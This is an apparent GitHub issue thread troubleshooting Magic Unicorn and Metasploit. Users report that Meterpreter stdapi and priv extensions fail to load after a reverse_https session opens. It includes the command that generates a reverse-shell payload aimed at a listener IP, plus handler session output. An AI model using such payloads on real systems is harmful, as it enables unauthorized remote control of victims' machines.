meterpreter > load stdapi Loading extension stdapi... [-] Failed to load extension: No response was received to the core_enumextcmd request.
myexploit opened this issue · 2 comments
Hi, sorry im still getting the error when I try and load stdapi and priv in meterpreter .
Im using Magic Unicorn Attack Vector v3.8
python unicorn.py windows/meterpreter/reverse_https 192.168.1.2 443
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
[-] Unknown command: shell.
meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter > load stdapi
Loading extension stdapi...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter > load stdapi priv
Loading extension stdapi...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
Loading extension priv...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
Hmm, not sure, am able to use it normally on my test system with windows 7 and windows 10
I am also experiencing this issue on a windows 10 host machine. I execute the payload, get a shell back, but the shell is non-responsive. Trying to load stdapi results in the same error message